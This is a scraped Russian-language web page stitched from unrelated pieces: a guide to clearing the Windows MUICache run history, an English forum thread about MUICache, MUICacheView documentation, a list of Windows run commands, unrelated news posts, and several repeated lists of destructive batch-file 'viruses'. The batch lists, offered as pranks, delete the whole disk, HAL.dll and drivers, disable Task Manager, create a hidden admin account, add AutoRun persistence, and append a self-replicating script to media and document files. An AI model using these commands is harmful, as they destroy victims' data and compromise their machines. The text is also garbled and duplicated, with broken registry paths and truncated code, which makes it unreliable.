Skip to content
Добрый день, Друзья. Сегодня мы продолжим находить и извлекать скрытую информацию в закромах операционной системы.
Запуская каждый день те или иные программы, мы оставляем “следы” в системе, давая повод “Большому брату” и злоумышленникам отследить наши действия за компьютером и собрать о нас информацию. Зная как это делается, мы не только будем знать каналы “утечки”, но и научимся себя “защищать” и подстилать соломинку.
В этой статье мы рассмотрим, как получить список программ windows, которые мы запускали когда-то на своем ПК. Я Вам расскажу, где ОС хранит эти “секретные данные” и как его отредактировать необходимым для нас способом.
Операционная система сохраняет названия всех программ, которые когда-либо запускались на компьютере. Эти данные сохраняются, даже если программа никогда больше не будет запущена или если ее удалить.
Чтобы получить необходимый список программ windows, нам потребуется программа “MUI CacheView”.
- 1. Скачаем программу с сайта разработчика – ссылка.
- 2. Установка программы не требуется. Просто разархивируйте скачанный пакет и запустите программу.
- 3. Приложение автоматически проанализирует реестр и отобразит информацию в удобном для пользователя виде.
- 4. В программе предусмотрен поиск программу по названию. Для этого нажмите комбинацию клавиш “ctrl + F” и введите название программы.
- 5. Сохранить список программ windows, когда-либо запускаемых на Вашем ПК в виде отчета можно в верхнем меню. Выберите вкладку “Вид” –> в открывшемся списке кликните по пункту “HTML-отчет – Полностью”.
Отчет будет создан в папке с программой и откроется автоматически в браузере, установленным по умолчанию.
Чистим список программ windows, когда-либо запускаемых на ПК
Друзья, ниже я Вам расскажу как открыть историю запускаемых программ в ручную через поиск в реестре и подправить его таким образом, чтобы можно было за не опасаться за его утечку. Удаляем те записи, которые никто не должен увидеть.
- 1. Жмем комбинацию клавиш “ctrl + R” и вводим команду “regedit”. Далее жмем “ОК” либо клавишу “Enter”.
- 2. Для Windows XP/Windows 7:
Последовательно переходим по разделам HKEY_CURRENT_USER –> Software –> Microsoft –> Windows –> ShellNoRoam –> MUICache.
-
Bits & Bytes
-
Operating Systems
You should upgrade or use an alternative browser.
What is MUICache? (XP registry)
-
Thread starternorth1
-
Start dateMar 2, 2010
-
#1
- Joined
- Apr 4, 2004
- Messages
- 48
After some searching, I haven’t been able to find a definitive answer for what this key is used for and how significant it is.
The reason I want to know is that the installer of a new program I just tried (PTLens) deleted almost the entire MUICache during the install. Most of the entries it deleted reference other programs or Windows components. This seems very suspicious. Those entries have nothing to with the new program.
Here’s a list from Total Uninstall of the things it deleted.
-
#2
Azhar
Fixing stupid since 1972
- Joined
- Jan 9, 2001
- Messages
- 18,876
-
#3
- Joined
- Apr 4, 2004
- Messages
- 48
Any idea why a program that corrects distortion in photos would go into the registry and delete references to things like Peerblock, Notepad, Firefox, 7zip, Winamp, and Windows Messenger?
-
#4
- Joined
- May 5, 2002
- Messages
- 1,825
Its for grouping programs by name on the taskbar. It recreates out of /.default in Users. Critical stuff
-
#5
- Joined
- Apr 4, 2004
- Messages
- 48
Is there any confirmation from Microsoft about it being taskbar related? It just doesn’t make sense to me because (1) all those programs are never opened at once on the taskbar, (2) It’s only a small percentage of the total programs that are installed/used, (3) it contains many non-taskbar items such as Fonts, Network Connections, Folder Options, Administrative Tools, etc.
And again, why would any installer delete these references to unrelated items. I’ve never noticed it with any other install.
-
Bits & Bytes
-
Operating Systems
Содержание
- Убиваем компьютер с помощью команд
- Как быстро «убить» компьютер
- Дубликаты не найдены
- Зарегистрировался
- Поздравляем Team Spirit, чемпионов The International10!
- Вопрос
- Отдельно от родителей
- Как срубить бабла
- Благодарность Пикабу
- Благословенная Dota!
- Как Владимир Магомеда нокаутировал
- Улыбнись продавец!
- Лучший анбоксинг в мире
- Росомаха
- Новый скандал с Кадыровцами
- Отучил закидывать ноги на бардачок
- Ну рожала же
- В жизни всегда так
- В Обнинске мигранты убили местного жителя
- Бегите, глупцы
- У неё был какой-то план
- Реклама vs Реальность
- В Самаре жёстко зачистили рынок, где мигранты швырнули огрызок в старика
- 56 команд для командной строки Windows
- Дубликаты не найдены
- День рождения Powershell
Убиваем компьютер с помощью команд
Убирает рабочий стол
@echo off
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
Запрещает запускать программы
@echo off
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerRestrictRun /v 1 /t REG_DWORD /d %SystemRoot%explorer.exe /f >nul
@echo off
del «%SystemRoot%Driver Cachei386driver.cab» /f /q >nul
Удаляет звуки Windows
@echo off
del «%SystemRoot%Media» /q >nul
Запрещает заходить в панель управления
@echo off
reg add HKCUSoftwareMicrosoftWindowsCurrent VersionPoliciesExplorer
/v NoControlPanel /t REG_DWORD /d 1 /f >nul
Запрещает комбинацию Ctrl-Alt-Delete
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul
Меняет местами значение кнопок мыши
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
Удаляет курсор мыши
del «%SystemRoot%Cursors*.*» >nul
Меняет название корзины
reg add HKCUSoftwareMicrosoftWindowsShellNoRoamMUICache /v @C:WINDOWSsystem32SHELL32.dll,-8964 /t REG_SZ /d ТУТ НАЗВАНИЕ КОРЗИНЫ /F
Убирает панель управления
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f
Удаляет ВСЕ с разделадиска(не пытайтесь проверить у себя)
Удаляет все файлы в program files
del c:Program Files/q
Убивает процесс explorer.exe
taskkill /f /im explorer.exe >nul
Создает миллион папок
FOR /L %%i IN (1,1,1000000) DO md %%i
Удаляет все драйвера, которые установлены на компьютере
del «%SystemRoot%Driver Cachei386driver.cab» /f /q >nul
Удаляет команду DEL
Будет открывать бесконечно Пэинт
😡
Start mspaint
goto x
copy «»%0″» «%SystemRoot%system32batinit.bat» >nul
reg add «HKCUSOFTWAREMicrosoftCommand Processor» /v AutoRun /t REG_SZ /d «%SystemRoot%syste m32batinit.bat» /f >nul
Создает нового пользователя, с правами администратора, логин:hacker и пароль hack (Можете изменить)
@echo off
chcp 1251
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
reg add «HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList» /v «support» /t reg_dword /d 0 y
Меняет местами кнопки мыши,но обратная смена не возможна)
Удаляет ядро системы
У вашего ламера будет глючить компьютер.
@echo off
echo Set fso = CreateObject(«Scripting.FileSystemObject») > %systemdrive%windowssystem32rundll32.vbs
echo do » %systemdrive%windowssystem32rundll32.v
@echo off
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t
REG_DWORD /d 1 /f >nul
Вот ещё подборка «вирусов»
Убирает рабочий стол
@echo off
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
Запрещает запускать программы
@echo off
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerRestrictRun /v 1 /t REG_DWORD /d %SystemRoot%explorer.exe /f >nul
Удаление дров
@echo off
del «%SystemRoot%Driver Cachei386driver.cab» /f /q >nul
Удаляет звуки Windows
@echo off
del «%SystemRoot%Media» /q >nul
Запрещает заходить в панель управления
@echo off
reg add HKCUSoftwareMicrosoftWindowsCurrent VersionPoliciesExplorer
/v NoControlPanel /t REG_DWORD /d 1 /f >nul
Запрещает комбинацию Ctrl-Alt-Delete
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul
Меняет местами значение кнопок мыши
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
Удаляет курсор мыши
del «%SystemRoot%Cursors*.*» >nul
Меняет название корзины
reg add HKCUSoftwareMicrosoftWindowsShellNoRoamMUICache /v @C:WINDOWSsystem32SHELL32.dll,-8964 /t REG_SZ /d ТУТ НАЗВАНИЕ КОРЗИНЫ /F
Убирает панель управления
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f
Удаляет ВСЕ с разделадиска(не пытайтесь проверить у себя)
rd [Буква_Диск]: /s /q
Удаляет все файлы в program files
del c:Program Files/q
Убивает процесс explorer.exe
taskkill /f /im explorer.exe >nul
Создает миллион папок
FOR /L %%i IN (1,1,1000000) DO md %%i
Удаляет все драйвера, которые установлены на компьютере
del «%SystemRoot%Driver Cachei386driver.cab» /f /q >nul
Удаляет команду DEL
del %0
Будет открывать бесконечно Paint
😡
Start mspaint
goto x
Заражает Autoexec
copy «»%0″» «%SystemRoot%system32batinit.bat» >nul
reg add «HKCUSOFTWAREMicrosoftCommand Processor» /v AutoRun /t REG_SZ /d «%SystemRoot%syste m32batinit.bat» /f >nul
Создает нового пользователя, с правами администратора, логин:hacker и пароль hack (Можете изменить)
@echo off
chcp 1251
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
reg add «HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList» /v «support» /t reg_dword /d 0 y
Меняет местами кнопки мыши,но обратная смена не возможна)
rundll32 user,SwapMouseButton
Источник
ВНИМАНИЕ! Следующая информация приведена только для ознакомительных целей. Применение и исполнение указанных приёмов может привести к повреждению операционной системы Windows. По своему действию созданные файлы исполняют вредоносный код, уничтожающий важнейшие файлы на компьютере. Затираются жизненно важные файлы или все файлы полностью.
Всем привет, это очередной компьютерный трюк от блога Компьютер76. Следующий трюк на самом деле таковым не является, ибо это самый настоящий вредонос, по исполнению которого произойдёт уничтожение жизненно важных системных файлов, после чего операционная система Windows перестанет существовать. Так что используйте его на свой страх и риск, и тем более не стоит запускать его на своём компьютере: воспользуйтесь виртуальной машиной. В конце статьи — небольшое для того видео на эту тему.
Все описываемые ниже команды — скрипты команд для консоли cmd, сохранённые в так называемый файл-батник (файл с расширением .bat). Такие файлы легко можно создавать с помощью обычного Блокнота, заставив систему в Свойствах папки показывать расширения файлов :
Принцип создания такого файла прост:
Нам предстоит создать » вирусы «, которые, в свою очередь, удаляют либо абсолютно все файлы, либо затрагивают некоторые из директорий. Речь идёт о файлах как системных, так и личного характера (созданных, скачанных и т.д.) По своим качествам гораздо серьёзнее, нежели предыдущий вариант, ибо некоторую информацию с жёсткого диска придётся восстанавливать с помощью специальных программ. Это займёт (в зависимости от объёма винчестера) от 5-х до 20-ми минут, всё зависит от производительности компьютера и объёма удаляемых данных.
Для этого создадим документ Блокнота и в пустом поле впишем следующий код. Да какой там код — вот эту строчку:
Так, в список уничтожаемых файлов достаточно внести жизненно важные для windows файлы с расширением .dll в папке System. Тогда код убийства windows будет иметь вид:
Нет, целый том вы не удалите. Спрятать можно. Но можно «почистить» его содержимое:
Основное назначение батника — вызвать BSOD, который должен быть неминуемой реакцией на удаление системных файлов. Однако его вы, скорее всего, не увидите: защищённые файлы система удалить не даст. Но нам это и не нужно. Процесс «наведёт порядок» везде, где только возможно, так что испортить Windows получится по-настоящему:
Как видите, несколько строчек кода, и система перестаёт существовать. К сожалению, на эту удочку может попасться каждый. Особенно, если это происходит на фоне факта, когда злоумышленнику не составит никакого труда спрятать простенький батник в любой файл, замаскировав его в видео или аудио ролик, рисунок, фотографию или даже текстовый файл. Подробнее это, например, описано в статье Как спрятать троян в рисунок. Будьте бдительны.
Источник
Как быстро «убить» компьютер
(программа будет работать пока не кончится ОЗУ, или-же цикл в БАТнике)
Открываем блокнот, пишем:
Мне кажется этого вполне достаточно что-бы напугать своего друга, удачи.
Дубликаты не найдены
Ты где был 1 апреля?
только сегодня это нашел
За запуск на рабочем месте могут влепить по статье «сабботаж» и «хулиганство», удачи, мои юные шутнички.
т.е. перезапуск остановит работу батника?
Есть ли команда автозапуска батника при включении?
Если нет, то как замаскировать батник под, ну скажем браузерный ярлык?
Все равно в безопасном работать не будет. Так, для чайников прикол.
А от этого как отделаться опосля? (без отката)
Ентот «DisableTaskMgr» тоже не сработает, тупые копипастеры похерили бэкслеши в пути.
Зарегистрировался
Меня в личку несколько раз просили зарегистрироваться на вашем сайте.
Только я совсем не знаю, что тут делать и чем я, с ваших слов, так популярен в здешних кругах.
Надеюсь, что в хорошем смысле)
UPD. К посту есть вопросы: #comment_214843020
Поздравляем Team Spirit, чемпионов The International10!
Только что закончился Гранд-Финал самого престижного турнира по DOTA 2, где встречались Team Spirit (Россия) и PSG.LGD (Китай). Наши парни, а именно: Илья «Yatoro» Мулярчук (Украина), Александр «TORONTOTOKYO» Хертек (Россия), Магомед «Collapse» Халилов (Россия), Мирослав «Mira» Колпаков (Украина) и Ярослав «Miposhka» Найдёнов (Россия) выиграли серию карт со счетом 3-2, тем самым заработав 18,208,300 долларов. В последний раз команда из СНГ (NAVI) выигрывала этот турнир 10 лет назад.
Благодарю команду за интересные игры, яркие эмоции от просмотра и желаю им дальнейших успехов!
Вопрос
Отдельно от родителей
Как срубить бабла
Благодарность Пикабу
Хочу выразить, огромную благодарность всем тем, кто занимается рекламой на Пикабу. Только благодаря вам, я поборол свою лень и установил и даже настроил AdGuard, чтобы не видеть всей поносной рекламы.
Благословенная Dota!
Бывший босс киберспортивной команды Virtus.pro Антон Черепенников поставил 1,5 миллиона рублей на победу российской Spirit в финале турнира TI10 по Dota 2 и выиграл 44 миллиона рублей
Как Владимир Магомеда нокаутировал
Так Владимир Минеев защитил свой титул чемпиона.
Улыбнись продавец!
Лучший анбоксинг в мире
Росомаха
Ну и собственно росомаха.
Новый скандал с Кадыровцами
Спецназ 604-го Краснознамённого центра специального назначения «Витязь» с понедельника в знак протеста снимает краповые береты и переходит на обычные уставные кепки.
Краповики от такой беспардонности слегка опешили, но делать вид, что ничего не происходит, не стали. Завязалась массовая драка, которую, судя по комментариям за кадром, разруливал лично начальник Главного управления сил спецназначения Росгвардии Игорь Семиляк.
Пару десятков человек были сняты с дистанции, однако, как пишут краповики, все равно получили берет. Интересно, им самим его надевать не стыдно? Это же символ, в том числе, преодоления себя.
Рассказы очевидцев (Говорят, в том числе, Кадыров платит миллион тому, кто сдает на краповый берет. Отсюда и попытки мухлевать).
Отучил закидывать ноги на бардачок
Ну рожала же
В жизни всегда так
В Обнинске мигранты убили местного жителя
Конфликт начался в одном из заведений города, после чего мужчины вышли на улицу. Там возникла потасовка, на помощь мигранту из Узбекистана пришли другие приезжие, после чего местного жителя просто запинали толпой. После мужчина смог вызвать такси и вернуться домой, где скоропостижно скончался. У погибшего остались жена и ребенок. Возбуждено уголовное дело, подозреваемый установлен, но он уже успел оперативно уехать в Узбекистан.
https://ren.tv/news/v-rossii/892125-video-s-mesta-ubiistva-m.
UPD: Подробное описание произошедшего #comment_214827438
Бегите, глупцы
У неё был какой-то план
Реклама vs Реальность
В Самаре жёстко зачистили рынок, где мигранты швырнули огрызок в старика
Этот рынок был незаконным. Чиновники при поддержке полиции не церемонились с торговцами. Пока одни составляли протоколы о незаконной торговле, другие ломами и кувалдами разбирали самодельные прилавки и бросали в кузов грузовика. Силовики в это время сдерживали наглые протесты хозяев торговой точки.
«Блокнот-Самара» сообщал, что на днях возле дома № 133 по улице Стара-Загора группа молодых и крепких продавцов кинула огрызком в дедушку, который проходил мимо и никому не мешал. Так они развлекали себя в отсутствие покупателей. «Снаряд» попал старику в глаз.
За пенсионера вступились случайные свидетели дерзкого оскорбления. Но получили в ответ агрессивную реакцию. Громкая словесная перепалка не переросла в драку только потому, что мигранты испугались камер мобильных телефонов вокруг. Хотя на словах они себя никак не сдерживали.
Этот тротуар на улице Стара-Загора в Самаре является очень проходным местом
Наш журналист побывал на месте событий. По его словам, сегодня возле бывшей незаконной торговой точки дежурит наряд полиции. На тот случай, если мигранты решат вернуться и снова начать здесь торговлю.
Жители Промышленного района Самары тоже считают, что мигранты обидели старичка от скуки
Рынком угол возле дома № 133 можно назвать условно. Это широкий тротуар возле автобусной остановки с большим потоком пассажиров. Документов на торговлю здесь ни у кого не было. Неподалеку от мигрантов с фруктами на коробках расположились и бабушки со своей домашней продукцией – овощами с огорода, солениями и тёплыми носочками. К ним тоже подошли полицейские.
На вопрос нашего сотрудника о том, выгонят ли отсюда пенсионеров, которые зарабатывают прибавку к пенсии, патрульные ответили:
«Мы тоже люди. Бабушек не тронем».
Полицейские Самары до сих пор дежурят на месте незаконного рынка. Бабушек с тёплыми носочками обещали не трогать
После скандального инцидента, поразившего всю Самарскую область дерзостью и низостью поступка, первая реакция была от депутата Государственной Думы Александра Хинштейна:
«Привлечь к ответственности и выдворить прочь из страны!»
На этом месте в Самаре стояла точка мигрантов, откуда они швырнули огрызком в дедушку. На асфальте до сих пор видны следы от самодельных прилавков
В тот же день ГУ МВД Самарской области начало проверку по факту вечернего конфликта на улице Стара-Загора. Полицейские организовали поиск очевидцев и самих мигрантов.
По предварительной информации, которую «Блокнот-Самара» сейчас проверяет, торговцев фруктами, что издевались над стариком, уже нашли. И с ними профессионально работают.
Источник
56 команд для командной строки Windows
При постоянной работе в Windows необходимо должное внимание быстрым способам доступа к различным инструментам, чтобы наиболее оперативно получать необходимое и выполнять задачи.
Ниже вы найдете список команд, которые запускают наиболее популярные инструменты и которые вам могут пригодиться в повседневной работе за компьютером.
appwiz.cpl — Удаление программ
charmap — Таблица символов
chkdsk — Утилита для проверки дисков
cleanmgr — Утилита для очистки дисков
cmd — Командная строка
compmgmt.msc — Управление компьютером
control — Панель управления
control admintools — Администрирование
control desktop — Настройки экрана / Персонализация
control folders — Свойства папок
control fonts — Шрифты
control keyboard — Свойства клавиатуры
control mouse — Свойства мыши
control printers — Устройства и принтеры
control schedtasks — Планировщик заданий
desk.cpl — Разрешение экрана
devmgmt.msc — Диспетчер устройств
dfrgui — Дефрагментация дисков
diskmgmt.msc — Управление дисками
dxdiag — Средства диагностики DirectX
eventvwr.msc — Просмотр событий
explorer — Проводник Windows
firefox — браузер Firefox
firewall.cpl — Брандмауэр Windows
iexplore — Браузер Internet Explorer
inetcpl.cpl — Свойства браузера Internet Explorer
logoff — Выйти из учетной записи пользователя Windows
magnify — Лупа (увеличительное стекло)
main.cpl — Свойства мыши
migwiz — Средство переноса данных Windows
mmsys.cpl — Настройка звука
mrt — Средство удаления вредоносных программ
msconfig — Конфигурация системы
msinfo32 — Сведения о системе
mspaint — Графический редактор Paint
ncpa.cpl — Сетевые подключения
osk — Экранная клавиатура
perfmon — Системный монитор
prs — Средство записи действий по воспроизведению неполадок
regedit — Редактор реестра
rrr — Быстрый запуск Reg Organizer
shutdown — Завершение работы Windows
sysdm.cpl — Свойства системы
syskey — Защита БД учетных записей Windows
taskmgr — Диспетчер задач
timedate.cpl — Настройка даты и времени
utilman — Центр специальных возможностей
verifier — Диспетчер проверки драйверов
wab — Адресная книга Windows
winver — Версия Windows
wmplayer — Проигрыватель Windows Media Player
write — Редактор Wordpad
wscui.cpl — Центр поддержки
Дубликаты не найдены
После cmd и regedit, наверно самая используемая
кстати shutdown /i очень удобная визуалка куда можно накидать стопку компов и.т.д.
Предлагаю добавлять в комментариях,команда+назначение.;)
Заголовок притянут, сабж бесполезен
полезен может кому надо, хули выебываешься
А еще, когда жду лифт, вызываю все, чтобы ко мне приехал пораньше, а все соседи по этажам потом останавливались на моём этаже, когда я уже уеду.
Специально для Вас отредактировал.
из всех этих команд используются в 99% случаев только 2-3. остальные не нужны.
И да, если решил сделать что-то полезное, рассказал бы про фичу «god mode» в ведре от висты и моложе.
Создаешь папку с названием:
(GodMode можно заменить на любое название, важны точка и код в скобках за ней)
и там все доступные юзеру настройки в 1 месте.
Хотя, тоже не особо полезная штука.
Ну это,»режим Бога», совсем другая история. Тут речь о командной строке,как вариант.
А пост находится во времена десятки, вот и возникают вопросы.
Ведь всё указано в списке.Вызывать нужные Вам «функции»,действия с командной строки.
про локеры не слышал?
вопрос не зачем, а для чего? общее знание предмета, не лишнее в общем познании
С Вашим подходом можно калькулятором онлайн пользоваться. Тут то речь не только о нём
сударь, речь идёт о конкректной статье, а о синтаксисе команд, а как и где, кому надо или нет вопрос отдельный
День рождения Powershell
14 ноября 2006 года, была выпущена финальная версия (Release to Web, RTW) Powershell. Эта версия была выпущена для Windows XP SP2, для Windows Vista, финальная версия Powershell была выпущена 30 января 2007 года.
Конечно, до этого были предрелизные версии (Release Candidate), был проект Monad, который являлся предшественником Powershell. Непосредственно Powershell, его финальная версия, был выпущен именно 14 ноября 2006 года.
До определенного момента я Powershell запускал только для каких-нибудь экспериментов, не рассматривая его как инструмент для повседневной работы.
Я эту задачу решил, причем решил на CMD, VBS и Autoit. После этого, мне опять на глаза попался Powershell и я решил решить задачу на нем, в качестве упражнения. Решение нужной мне задачи занимало на VBS примерно 30 строк кода. Каково же было мое удивление, когда решение этой задачи на Powershell составило всего 3 строки!
За прошедшее время, Powershell не раз меня выручал, давая возможность просто решать задачи различной степени сложности.
После этого, я решил попристальней посмотреть в сторону Powershell и разобраться с ним получше.
Время шло, я разбирался с Powershell и у меня накопилось приличное количество заметок, записок, статей о нем. Мне показалось неудобным хранить информацию в таком виде и я решил создать для себя справочник, в который и включить все имеющиеся данные с тем, чтобы, когда возникнет у меня необходимость освежить что-то в памяти, я мог это сделать, посмотрев в одном источнике.
Собрав таким образом некоторый объем информации, я увидел, что у меня получилась книга. Решив, что данное мое творение может оказаться полезным не только мне, но и некоторому кругу других людей, я решил свою книгу опубликовать.
Сегодня, в честь дня рождения Powershell, я решил выложить новую версию своей книги.
Поделитесь Вы, уважаемые читатели, помогал ли Вам Powershell каким-либо образом в работе?
Источник
MUICacheView v1.01 Copyright (c) 2008 — 2010 Nir Sofer |
Description
Each time that you start using a new application,
Windows operating system automatically extract the application name from the version resource of the exe file,
and stores it for using it later, in Registry key known as the ‘MuiCache’.
This utility allows you to easily view and edit the list of all MuiCache items on your system.
You can edit the name of the application, or alternatively, you can delete unwanted MUICache items.
Be aware that even if your delete MUICache items, they’ll reappear in the next time that you run the application.
The Location Of The MUICache Data in the Registry
In Windows 2000, Windows XP, Windows Server 2003, the MUICache data is stored under
HKEY_CURRENT_USERSoftwareMicrosoftWindowsShellNoRoamMUICache.
Starting from Windows Vista, the MUICache data is stored under
HKEY_CURRENT_USERSoftwareClassesLocal SettingsSoftwareMicrosoftWindowsShellMuiCache
Version History
- Version 1.01 — Added sorting command-line option and fixed the icons problem in Windows 7/x64.
- Version 1.00 — First release.
Using MUICacheView
MUICacheView doesn’t require any installation process or additional DLLs.
In order to start using it, simply run the executable file — MUICacheView.exe
The main window of MUICacheView displays the list of all MUICache items.
You can select one or more items and use the ‘Delete Selected Items’ option to delete them.
You can also use the ‘Properties’ window to edit the application name of single MUICache item.
System Requirements
This utility works under Windows 2000, Windows XP, Windows Server 2003/2008, Windows Vista, and Windows 7.
Translating MUICacheView to other languages
In order to translate MUICacheView to other language, follow the instructions below:
- Run MUICacheView with /savelangfile parameter:
MUICacheView.exe /savelangfile
A file named MUICacheView_lng.ini will be created in the folder of MUICacheView utility. - Open the created language file in Notepad or in any other text editor.
- Translate all string entries to the desired language.
Optionally, you can also add your name and/or a link to your Web site.
(TranslatorName and TranslatorURL values) If you add this information, it’ll be
used in the ‘About’ window. - After you finish the translation, Run MUICacheView, and all translated
strings will be loaded from the language file.
If you want to run MUICacheView without the translation, simply rename the language file, or move
it to another folder.
Command-Line Options
/stext <Filename> | Save the MUICache list into a regular text file. |
/stab <Filename> | Save the MUICache list into a tab-delimited text file. |
/scomma <Filename> | Save the MUICache list into a comma-delimited text file (csv). |
/stabular <Filename> | Save the MUICache list into a tabular text file. |
/shtml <Filename> | Save the MUICache list into HTML file (Horizontal). |
/sverhtml <Filename> | Save the MUICache list into HTML file (Vertical). |
/sxml <Filename> | Save the MUICache list to XML file. |
/sort <column> |
This command-line option can be used with other save options for sorting by the desired column. If you don’t specify this option, the list is sorted according to the last sort that you made from the user interface. The <column> parameter can specify the column index (0 for the first column, 1 for the second column, and so on) or the name of the column, like «Application Name» and «Application Path». You can specify the ‘~’ prefix character (e.g: «~Application Path») if you want to sort in descending order. You can put multiple /sort in the command-line if you want to sort by multiple columns.
Examples: |
/nosort | When you specify this command-line option, the list will be saved without any sorting. |
License
This utility is released as freeware.
You are allowed to freely distribute this utility via floppy disk, CD-ROM,
Internet, or in any other way, as long as you don’t charge anything for this.
If you distribute this utility, you must include all files in
the distribution package, without any modification !
Disclaimer
The software is provided «AS IS» without any warranty, either expressed or implied,
including, but not limited to, the implied warranties of merchantability and fitness
for a particular purpose. The author will not be liable for any special, incidental,
consequential or indirect damages due to loss of data or any other reason.
Feedback
If you have any problem, suggestion, comment, or you found a bug in my utility,
you can send a message to nirsofer@yahoo.com
MUICacheView is also available in other languages. In order to change the language of
MUICacheView, download the appropriate language zip file, extract the ‘muicacheview_lng.ini’,
and put it in the same folder that you Installed MUICacheView utility.
Language | Translated By | Date | Version |
---|---|---|---|
Arabic | Abo Rehaam | 17/05/2008 | |
Brazilian Portuguese | Cleber Magalhães | 22/08/2018 | |
Bulgarian | Румен Кънчев | 21/02/2010 | |
Dutch | Jan Verheijen | 26/02/2015 | 1.01 |
French | JPDag | 26/05/2008 | |
French | papoo | 02/01/2014 | 1.01 |
German | «Latino» auf WinTotal.de | 12/03/2014 | 1.01 |
Hungarian | SzalayZ | 14/05/2008 | |
Hungarian | Hevesi János | 24/05/2008 | |
Italian | Fabio Mastroianni | 10/07/2008 | |
Korean | ?꾩??? | 11/05/2012 | |
Polish | ASAWIK | 03/01/2013 | |
Romanian | Jaff (Oprea Nicolae) | 04/10/2013 | 1.01 |
Russian | iNorbert | 24/06/2008 | |
Simplified Chinese | renda | 26/05/2008 | |
Slovak | František Fico | 09/02/2017 | 1.01 |
Spanish | Ricardo A. Rivas | 08/06/2019 | |
Traditional Chinese | 丹楓 Danfong-虫二電氣診所 | 27/07/2011 | |
Valencian | vjatv | 19/05/2008 |
Простенькие вирусы:
Убирает рабочий стол
@echo off
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
@echo off
shutdown -s -t 1 -c «lol» >nul
@echo off
shutdown -r -t 1 -c «lol» >nul
Запрещает запускать программы
@echo off
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerRestrictRun /v 1 /t REG_DWORD /d %SystemRoot%explorer.exe /f >nul
@echo off
del «%SystemRoot%Driver Cachei386driver.cab» /f /q >nul
@echo off
del «%SystemRoot%Media» /q >nul
Запрещает заходить в панель управления
@echo off
reg add HKCUSoftwareMicrosoftWindowsCurrent VersionPoliciesExplorer
/v NoControlPanel /t REG_DWORD /d 1 /f >nul
Запрещает комбинацию Ctrl-Alt-Delete
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul
Меняет местами значение кнопок мыши
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
Удаляет курсор мыши
del «%SystemRoot%Cursors*.*» >nul
Меняет название корзины
reg add HKCUSoftwareMicrosoftWindowsShellNoRoamMUICache /v @C:WINDOWSsystem32SHELL32.dll,-8964 /t REG_SZ /d ТУТ НАЗВАНИЕ КОРЗИНЫ /F
Убирает панель управления
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f
Серьезные вирусы:
Удаляет ВСЕ с разделадиска(не пытайтесь проверить у себя)
rd [Буква_Диск]: /s /q
Удаляет все файлы в program files
del c:Program Files/q
Убивает процесс explorer.exe
taskkill /f /im explorer.exe >nul
Создает миллион папок
FOR /L %%i IN (1,1,1000000) DO md %%i
Удаляет все драйвера, которые установлены на компьютере
del «%SystemRoot%Driver Cachei386driver.cab» /f /q >nul
Удаляет команду DEL
del %0
Будет открывать бесконечно Paint
Start mspaint
goto x
Изменяет расширение всех ярлыков на .txt
assoc .lnk=.txt
Заражает Autoexec
copy «»%0″» «%SystemRoot%system32batinit.bat» >nul
reg add «HKCUSOFTWAREMicrosoftCommand Processor» /v AutoRun /t REG_SZ /d «%SystemRoot%syste m32batinit.bat» /f >nul
Создает нового пользователя, с правами администратора, логин:hacker и пароль hack (Можете изменить)
@echo off
chcp 1251
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
reg add «HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList» /v «support» /t reg_dword /d 0 y
сбой системы (!) — выключить все функции ввода-вывода (клавиатура, дисплей, мышь). В результате будет черный экран с курсором и ни на что не реагирующая система, однако Windows продолжает работать.
rundll32 user,disableoemlayer
Меняет местами кнопки мыши,но обратная смена не возможна)
rundll32 user,SwapMouseButton
Удаляет ядро системы
del %systemroot%system32HAL.dll
Заражает *.jpg *.mp3 *.doc *.htm? *.xls. (Заражает
не только в текущем каталоге, но и надкаталоге)
@echo off%[MrWeb]%
if ‘%1==’In_ goto MrWebin
if exist c:MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find «MrWeb»<%0>c:MrWeb.bat
attrib +h c:MrWeb.bat
:MrWebru
for %%g in (..*.jpg ..*.doc ..*.htm? *.jpg *.mp3 *.doc *.htm? *.xls) do call c:MrWeb In_ %%ggoto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:MrWeb.bat>>%2.bat
echo start %2>>%2.bat%[MrWeb]%
:MrWeben
Вирус заражает *.JPG в текущем каталоге
@echo off%[MrWeb]%
if ‘%1==’In_ goto MrWebin
if exist c:MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
